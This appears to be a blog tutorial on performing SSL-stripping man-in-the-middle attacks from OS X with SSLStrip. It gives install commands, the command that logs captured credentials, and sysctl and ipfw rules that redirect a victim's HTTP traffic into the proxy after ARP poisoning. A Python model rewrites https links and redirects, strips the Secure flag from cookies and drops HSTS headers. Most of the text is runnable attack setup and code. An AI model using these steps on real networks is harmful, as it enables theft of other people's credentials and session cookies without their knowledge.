Wednesday, January 5, 2011

SSL stripping on OS X with SSLStrip

SSLStrip is a tool that demonstrates HTTPS stripping attacks: a man-in-the-middle sits on the victim's plaintext HTTP traffic and rewrites every https:// link and redirect it sees to http://, so the victim's browser never starts a TLS connection while the proxy talks HTTPS to the real server. You can download it from here.

Then on OS X 10.6.5 with MacPorts we need to install the following dependencies (SSLStrip is a Python 2 tool; the py25- ports are the builds for MacPorts' Python 2.5).

1. $ sudo port selfupdate

2. $ sudo port install py25-twisted-web2

3. $ sudo port install py25-socket-ssl

4. $ sudo port install py25-openssl

Now, run the following from the SSLStrip home directory. Use the MacPorts interpreter the dependencies were just installed for (python2.5 from /opt/local/bin) rather than the system python, or Twisted will not be found.

$ sudo python sslstrip.py -l 9090 -w captured.log

This will start SSLStrip listening on port 9090, and it will write all captured traffic, including any credentials submitted over the downgraded connections, into captured.log.
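What that listener does to each response it relays is easy to lose sight of behind the tooling, so here is a small model of the stripping step itself. This is an added example, not code from the SSLStrip project: the function names, the StripState bookkeeping class and the sample bank response are constructed for illustration only.

```python
"""
Model of what an HTTPS-stripping proxy does to the plaintext HTTP traffic
that ipfw hands it. Added example, not SSLStrip's own code: the function
names, StripState and the sample response below are this example's own
constructions.
"""
import re

# Matches an absolute https:// URL inside an HTML body or a header value.
SECURE_URL = re.compile(rb'https://([A-Za-z0-9.\-]+(?::\d+)?)(/[^\s"\'<>]*)?')


class StripState:
    """Remembers which (host, path) pairs the victim should have reached over
    TLS, so the proxy knows to fetch them over HTTPS upstream when the
    downgraded http:// request comes back in."""

    def __init__(self):
        self.secure_targets = set()

    def remember(self, host, path):
        self.secure_targets.add((host, path))


def strip_body(body, state):
    """Rewrite every https:// link in a response body to http:// and record
    the original target."""
    def downgrade(m):
        host, path = m.group(1), m.group(2) or b''
        state.remember(host.decode(), (path or b'/').decode())
        return b'http://' + host + path
    return SECURE_URL.sub(downgrade, body)


def strip_headers(headers, body_len, state):
    """Rewrite response headers so the downgraded page keeps working:
    - Location: https://... redirects become http:// (and are remembered);
    - the Secure flag is removed from Set-Cookie, otherwise the browser would
      withhold the session cookie on the plaintext connection and the victim
      would notice being logged out;
    - Strict-Transport-Security is dropped so the browser does not learn to
      insist on TLS (this only helps if it has not already cached the policy);
    - Content-Length is recomputed for the rewritten body.
    """
    out = []
    for name, value in headers:
        key = name.lower()
        if key == 'location':
            m = SECURE_URL.match(value.encode())
            if m:
                state.remember(m.group(1).decode(), (m.group(2) or b'/').decode())
                value = 'http://' + value[len('https://'):]
        elif key == 'set-cookie':
            value = re.sub(r';\s*secure(?=;|$)', '', value, flags=re.IGNORECASE)
        elif key == 'strict-transport-security':
            continue
        elif key == 'content-length':
            value = str(body_len)
        out.append((name, value))
    return out


def strip_response(headers, body, state):
    """Apply both rewrites to one HTTP response; returns (headers, body)."""
    new_body = strip_body(body, state)
    return strip_headers(headers, len(new_body), state), new_body


def upstream_url(host, path, state):
    """Given the plaintext request the victim now sends, decide which scheme
    the proxy must use towards the real server."""
    scheme = 'https' if (host, path) in state.secure_targets else 'http'
    return f'{scheme}://{host}{path}'


# Constructed sample response, as a bank's login page might send it.
SAMPLE_HEADERS = [
    ('Content-Type', 'text/html'),
    ('Content-Length', '0'),  # placeholder, recomputed by strip_headers
    ('Set-Cookie', 'session=abc123; Secure; HttpOnly'),
    ('Strict-Transport-Security', 'max-age=31536000'),
]
SAMPLE_BODY = (b'<html><body>'
               b'<form action="https://bank.example/login" method="post">'
               b'<a href="https://bank.example/">home</a>'
               b'</form></body></html>')
# Constructed sample redirect, as sent when a site bounces http:// to https://.
REDIRECT_HEADERS = [('Location', 'https://bank.example/account')]

if __name__ == '__main__':
    st = StripState()
    hdrs, body = strip_response(SAMPLE_HEADERS, SAMPLE_BODY, st)
    for name, value in hdrs:
        print(f'{name}: {value}')
    print(body.decode())
    print(upstream_url('bank.example', '/login', st))
```

The important limit is visible in upstream_url: the proxy only knows to go upstream over TLS for targets it has already rewritten once. A victim who types https:// directly, or whose browser has a cached HSTS policy for the site, never sends the plaintext request in the first place, so everything downstream of a plain-HTTP page is exposed and nothing else is.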

Now the interesting part. We need to make the traffic from the target machine go through SSLStrip. First we have to make sure the traffic flows through our machine at all, which we do by ARP poisoning the target machine. My previous blog post explains how to do that. Once that is done, we need to forward the incoming HTTP traffic to the port SSLStrip is listening on.

Enable IP forwarding on the Mac, so that the poisoned traffic is routed on rather than dropped, and enable ipfw verbose logging so that the log keyword on the redirect rule below actually produces entries.

$ sudo sysctl -w net.inet.ip.forwarding=1
$ sudo sysctl -w net.inet.ip.fw.verbose=1

Now add an ipfw rule that redirects the victim's HTTP traffic to the port SSLStrip is listening on. The fwd action needs a destination address as well as a port; "from not me" restricts the rule to forwarded traffic so this machine's own web requests are left alone; and only port 80 is matched, so the victim's existing HTTPS connections on 443 pass through untouched. That is why the attack only works from the moment the victim loads a plain-HTTP page that links or redirects to an HTTPS one. Once the rule is in, ipfw list shows it together with its packet count, which is the quickest check that forwarded traffic is really hitting it.

$ sudo ipfw add fwd 127.0.0.1,9090 log tcp from not me to any 80